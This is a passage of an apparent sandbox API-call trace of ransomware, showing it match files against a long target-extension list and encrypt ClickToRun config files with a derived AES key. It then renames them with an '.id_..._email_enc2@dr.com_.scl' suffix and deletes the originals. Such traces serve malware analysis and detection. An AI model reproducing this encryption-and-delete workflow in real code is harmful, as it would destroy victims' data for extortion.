i.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0158.755] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.756] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.756] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.759] ReadFile (in: hFile=0x388, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x7b6, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18b350*=0x7b6, lpOverlapped=0x0) returned 1
	[0158.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.765] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb880) returned 1
	[0158.788] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.788] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0158.805] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.805] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0158.806] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.807] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb95b0) returned 1
	[0158.808] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.809] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x7b6, dwBufLen=0x7b6 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x7c0) returned 1
	[0158.809] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.810] RtlMoveMemory (in: Destination=0xfdd3f8, Source=0xfdc138, Length=0x7b6 | out: Destination=0xfdd3f8) 
	[0158.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.810] CryptEncrypt (in: hKey=0xfb95b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x7b6, dwBufLen=0x7c0 | out: pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x7c0) returned 1
	[0158.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.811] CryptDestroyKey (hKey=0xfb95b0) returned 1
	[0158.811] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.811] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0158.812] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.812] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0158.812] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.812] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.813] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.813] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0158.814] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 104
	[0158.815] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0158.815] WriteFile (in: hFile=0x390, lpBuffer=0xfdd3f8*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd3f8*, lpNumberOfBytesWritten=0x18b358*=0x7c0, lpOverlapped=0x0) returned 1
	[0158.819] CloseHandle (hObject=0x390) returned 1
	[0158.820] CloseHandle (hObject=0x388) returned 1
	[0158.820] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml")) returned 1
	[0158.825] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.0.xml")) returned 0
	[0158.826] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5e44e88, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5e44e88, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5e47593, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x7b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeploymentConfig.1.xml", cAlternateFileName="DEPLOY~3.XML")) returned 1
	[0158.826] lstrcmpW (lpString1="DeploymentConfig.1.xml", lpString2="..") returned 1
	[0158.826] lstrcmpW (lpString1="DeploymentConfig.1.xml", lpString2=".") returned 1
	[0158.826] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\"
	[0158.826] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\", lpString2="DeploymentConfig.1.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml"
	[0158.826] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml") returned 62
	[0158.826] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.827] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\DeploymentConfig.1.xml", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml") returned 0x3e
	[0158.827] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.827] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0158.827] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml") returned="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml"
	[0158.827] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml") returned 62
	[0158.827] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.828] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0158.828] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.828] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0158.829] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.829] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.829] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0158.834] ReadFile (in: hFile=0x388, lpBuffer=0xfdc138, nNumberOfBytesToRead=0x7b4, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdc138*, lpNumberOfBytesRead=0x18b350*=0x7b4, lpOverlapped=0x0) returned 1
	[0158.839] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.839] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb2a8) returned 1
	[0158.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.842] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0158.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.842] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0158.842] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.843] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb92b0) returned 1
	[0158.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.843] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x7b4, dwBufLen=0x7b4 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x7c0) returned 1
	[0158.843] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.843] RtlMoveMemory (in: Destination=0xfdd3f8, Source=0xfdc138, Length=0x7b4 | out: Destination=0xfdd3f8) 
	[0158.843] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.844] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x7b4, dwBufLen=0x7c0 | out: pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x7c0) returned 1
	[0158.844] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.845] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0158.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.845] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0158.845] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.845] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0158.845] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.846] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.846] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.846] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0158.848] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 104
	[0158.848] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0158.848] WriteFile (in: hFile=0x390, lpBuffer=0xfdd3f8*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd3f8*, lpNumberOfBytesWritten=0x18b358*=0x7c0, lpOverlapped=0x0) returned 1
	[0158.852] CloseHandle (hObject=0x390) returned 1
	[0158.854] CloseHandle (hObject=0x388) returned 1
	[0158.854] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml")) returned 1
	[0158.858] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\deploymentconfig.1.xml")) returned 0
	[0158.858] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c5095b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x85c5095b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x85c5095b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeploymentConfig.2.xml", cAlternateFileName="DEPLOY~2.XML")) returned 1
	[0158.858] lstrcmpW (lpString1="DeploymentConfig.2.xml", lpString2="..") returned 1
	[0158.858] lstrcmpW (lpString1="DeploymentConfig.2.xml", lpString2=".") returned 1
